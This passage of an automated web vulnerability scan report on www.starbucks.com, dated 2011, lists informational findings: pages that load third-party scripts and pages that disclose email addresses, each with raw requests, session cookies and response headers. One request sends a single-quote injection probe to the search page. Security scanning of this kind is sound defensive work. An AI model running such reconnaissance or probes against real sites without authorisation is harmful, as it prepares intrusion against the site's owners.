User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:06 GMT
Connection: close
Content-Length: 47824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.286. http://www.starbucks.com/responsibility/learn-more/shared-values-blog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/shared-values-blog

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/shared-values-blog HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:33 GMT
Connection: close
Content-Length: 46198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.287. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/starbucks-shared-planet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/starbucks-shared-planet HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:27 GMT
Connection: close
Content-Length: 37200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.288. http://www.starbucks.com/responsibility/sourcing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:30 GMT
Connection: close
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.289. http://www.starbucks.com/responsibility/sourcing/cocoa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/cocoa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/cocoa HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:56 GMT
Connection: close
Content-Length: 38549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.290. http://www.starbucks.com/responsibility/sourcing/coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:05 GMT
Connection: close
Content-Length: 40795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.291. http://www.starbucks.com/responsibility/sourcing/farmer-support

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/farmer-support

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/farmer-support HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:32 GMT
Connection: close
Content-Length: 39257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.292. http://www.starbucks.com/responsibility/sourcing/store-products

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/store-products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/store-products HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:57 GMT
Connection: close
Content-Length: 38245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.293. http://www.starbucks.com/responsibility/sourcing/tea

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:35 GMT
Connection: close
Content-Length: 36819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.294. http://www.starbucks.com/responsibility/wellness

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/wellness

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/wellness HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:20 GMT
Connection: close
Content-Length: 41474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.295. http://www.starbucks.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search?keywords=%27 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:03:21 GMT
Content-Length: 33802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.296. http://www.starbucks.com/site-map

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site-map HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:21 GMT
Connection: close
Content-Length: 92706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.297. http://www.starbucks.com/smooth

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smooth HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=b3nzwklyjnnztbu1h1ntnzeg; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:25 GMT
Content-Length: 35230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.298. http://www.starbucks.com/store-locator

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /store-locator

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store-locator HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:06 GMT
Connection: close
Content-Length: 39794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<![endif]-->

   
   <script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2"></script>
...[SNIP]...

6.299. http://www.starbucks.com/whats-new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /whats-new HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:49 GMT
Connection: close
Content-Length: 46242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.300. https://www.starbucks.com/card/set-auto-reload

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.starbucks.com
Path:   /card/set-auto-reload

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /card/set-auto-reload HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:39 GMT
Connection: close
Content-Length: 35911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

7. Email addresses disclosed
There are 5 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The following email address was disclosed in the response:

Request

GET /about-us/company-information/online-policies/terms-of-use HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:20 GMT
Connection: close
Content-Length: 68702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="mailto:info@starbucks.com">info@starbucks.com</a>
...[SNIP]...

7.2. http://www.starbucks.com/customer-service/faqs/card

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/card

Issue detail

The following email address was disclosed in the response:

Request

GET /customer-service/faqs/card HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:45 GMT
Connection: close
Content-Length: 87706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<p>Some users are experiencing issues logging into their Starbucks Card accounts Please email us at starbuckscardmobile@starbucks.com and include your username and the time you experienced the issue to help our tech team isolate the issue. </p>
...[SNIP]...

7.3. http://www.starbucks.com/customer-service/faqs/coffeehouse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The following email addresses were disclosed in the response:

Request

GET /customer-service/faqs/coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:23 GMT
Connection: close
Content-Length: 59009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<p>Some users are experiencing issues logging into their Starbucks Card accounts. Please email us at starbuckscardmobile@starbucks.com and include your username and the time you experienced the issue to help our tech team isolate the issue.</p>
...[SNIP]...
<a href="mailto:info@mystarbucksidea.com">
...[SNIP]...

7.4. http://www.starbucks.com/customer-service/faqs/shop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The following email address was disclosed in the response:

Request

GET /customer-service/faqs/shop HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
